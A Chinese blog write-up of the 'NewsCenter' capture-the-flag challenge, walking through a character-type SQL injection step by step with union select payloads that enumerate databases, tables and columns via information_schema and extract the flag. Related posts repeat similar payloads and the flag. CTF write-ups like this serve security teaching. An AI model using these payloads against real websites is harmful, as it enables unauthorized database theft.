攻防世界【NewsCenter】SQL注入解题方法

已于 2022-06-22 11:54:52 修改
阅读量935 收藏 1
点赞数 4
分类专栏: 安全 文章标签: 数据库 sql web
于 2022-06-20 19:03:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43923736/article/details/125378249
版权

攻防世界【NewsCenter】解题方法

  1. 简单分析
    通过主页面可知,这是一个根据关键字搜索新闻的页面
    在这里插入图片描述

  2. 测试是否存在SQL注入
    用单引号闭合发现报错

    hello'

    将单引号注释掉后恢复正常

    hello'#

    输入 ’ 后使得sql语句中多了一个单引号造成错误,而注释掉后面内容后又恢复正常,说明输入的单引号与前面的id=1也形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号

  3. 判断select查询返回的列数
    使用order by字段测试,order by 3不报错,order by 4报错,说明列数为3

    hello order by 4#

  4. 判断页面回显的数据是第几列

    hello' union select 1,2,3 #

    假设搜索的结果为空,union select 1,2,3会回显相应的1,2,3,如果不为空,会回显第一条数据,假设只有一条数据满足,则可以用limit过滤(limit 1,1显示第二行数据)

    hello' union select 1,2,3 limit 1,1 #

    在这里插入图片描述
    根据回显结果可以看出会显示第二、三列的数据

  5. 获取数据库名

    hello' union select 1,database(),3#

    在这里插入图片描述
    可知数据库名为news

  6. 获取表名
    从系统数据库information_schema的TABLES表中根据数据库名news获取数据库名

    hello' union SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM information_schema.TABLES WHERE  TABLE_SCHEMA='news'#

    结果如下,可知flag在sercet_table表中
    在这里插入图片描述

  7. 获取列名
    在COLUMNS表中根据数据库名、表名获取列名

    hello' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM information_schema.COLUMNS WHERE  TABLE_SCHEMA='news' AND TABLE_NAME='secret_table'#

    可知列名为fl4g中存放着flag
    在这里插入图片描述

  8. 获取flag

    hello' UNION SELECT 1,GROUP_CONCAT(fl4g),3 FROM news.secret_table#

    在这里插入图片描述

且听,雨鸣。
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 371
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:[email protected] 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 3004
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
去除cnewscenter弹窗_攻防世界做题记录-NewsCenter
weixin_36293680的博客
02-05 3563
NewsCenter进入界面是一个明显的SQL注入题目(前面的图由于先存在word再复制过来所有略微有点小糊)sqlmap首先使用工具偷个懒随意的输入一个BEACONBurp Suite抓包存为TXT文件(我这里存为NEWSCENTER.txt)放入sqlmap目录打开大杀器-sqlmap查找数据库sqlmap>python sqlmap.py -r NEWSCENTER.txt –db...
SQL注入解题方法
最新发布
2302_79556885的博客
03-06 338
判断是数字注入还是字符注入?
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1497
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界-NewsCenter-(详细操作)做题笔记
qq_43715020的博客
06-10 1831
攻防世界-NewsCenter-(详细操作)做题笔记
攻防世界-NewsCenter详解
Mr_helloword的博客
08-11 5318
NewsCenter 进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入 我们输入1’ and 1=1 #判断有无sql注入发现有 查看列数1’ order by 3 # 联合查询 1’ union select 1,2,3 # 查表: 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 查字段: 1’ union
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
yuanxu8877的博客
11-28 783
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
newscenter_app
02-20
新闻中心单击以获取实时版本背景和概述新闻中心现场直播了当今主流媒体如何报道当前的主题。 一次查看CNN,Fox News,NBC,NYTimes和Huffington Post主页上的精选文章。 这个使用React构建的应用程序充当前端,并与...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
资源来自pypi官网。 资源全名:newscenter-2.0.4.tar.gz
攻防世界-web-newscenter
wuh2333的博客
05-30 985
攻防世界sql注入
攻防世界NewsCenter
qq_45955869的博客
05-19 460
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界 web进阶区 NewsCenter
m0_51395584的博客
06-17 789
攻防世界 web进阶区 NewsCenter 简单的SQL联合查询注入
Web安全(NewsCenter)
m0_56010012的博客
02-28 442
如题目环境报错,稍等片刻刷新即可
攻防世界NewsCenter
金 帛的博客
04-09 2120
攻防世界WP
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来了解更多信息。此外,NewsCenter还涉及到CTF(Capture The Flag)比赛和SQL注入攻击的内容。在这个应用程序中,有两个表,分别是news和secret_table,我们需要从secret_table表中找到flag(标志)。通过构造SQL语句,并利用搜索(search)功能,我们可以使用union select和group_concat函数来获取所需的信息。最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值